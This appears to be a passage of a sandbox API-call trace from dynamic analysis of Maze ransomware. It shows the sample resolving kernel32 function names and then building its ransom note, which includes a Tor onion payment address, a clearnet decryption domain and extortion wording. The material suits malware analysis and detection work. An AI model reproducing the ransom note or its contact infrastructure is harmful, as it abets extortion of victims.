lpString1=0x239db34, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.533] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.533] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.533] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.533] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.533] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.533] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.533] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.533] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.533] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.534] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.534] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.534] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.534] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.534] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.534] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.534] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.534] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.534] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.534] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.534] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.534] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.534] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.534] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.534] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.534] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.534] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.534] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.534] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.534] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.535] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.535] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.535] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.535] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.535] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.535] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.535] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.535] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.535] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.536] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.536] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.536] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.536] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.536] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.536] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.536] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.536] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.536] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.536] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.536] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.536] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.536] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.536] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.536] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.536] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.536] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.536] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.536] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.536] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.537] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.537] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.537] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.537] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.537] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.537] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.537] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.537] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.537] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.537] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.537] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.537] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.537] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.537] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.537] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.537] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.537] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.537] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.537] lstrcpyA (in: lpString1=0x239db34, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.538] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.538] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.538] lstrlenA (lpString="DELETEATOM") returned 10 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.538] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.538] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.538] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.538] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.538] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.538] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.538] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.538] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.538] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.538] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.538] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.538] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.538] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.538] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.538] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.538] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.538] lstrcpyA (in: lpString1=0x239db34, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.539] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.539] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.539] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.539] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.539] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.539] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.539] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.539] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.539] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.539] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.539] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.539] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.539] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.539] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.539] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.539] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.539] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.539] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.539] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.539] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.540] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.540] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.540] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.540] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.540] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.540] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.540] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.540] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.540] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.540] lstrcpyA (in: lpString1=0x239db34, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.540] lstrcatW (in: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42", lpString2="\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE KEY---\r\n%base64key%\r\n---END MAZE KEY---\r\n\r\n" | out: lpString1="Attention!\r\n\r\n----------------------------\r\n| What happened?\r\n----------------------------\r\n\r\nAll your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms.\r\nYou cannot access the files right now. But do not worry. You have a chance! It is easy to recover in a few steps.\r\n\r\n----------------------------\r\n| How to get my files back?\r\n----------------------------\r\n\r\nThe only method to restore your files is to purchase a unique for you private key which is securely stored on our servers. \r\nTo contact us and purchase the key you have to visit our website in a hidden TOR network.\r\n\r\nThere are general 2 ways to reach us:\r\n\r\n1) [Recommended] Using hidden TOR network.\r\n\r\n a) Download a special TOR browser: https://www.torproject.org/\r\n b) Install the TOR Browser.\r\n c) Open the TOR Browser.\r\n d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/9cda09f29c354b42\r\n e) Follow the instructions on this page. \r\n\r\n2) If you have any problems connecting or using TOR network\r\n\r\n a) Open our website: https://mazedecrypt.top/9cda09f29c354b42\r\n b) Follow the instructions on this page.\r\n\r\nWarning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. \r\n\r\nOn this page, you will see instructions on how to make a free decryption test and how to pay.\r\nAlso it has a live chat with our operators and support team.\r\n\r\n----------------------------\r\n| What about guarantees?\r\n----------------------------\r\n\r\nWe understand your stress and worry.\r\nSo you have a FREE opportunity to test a service by instantly decrypting for free three files on your computer!\r\nIf you have any problems our friendly support team is always here to assist you in a live chat!\r\n\r\n\r\n-------------------------------------------------------------------------------\r\nTHIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU\r\n---BEGIN MAZE 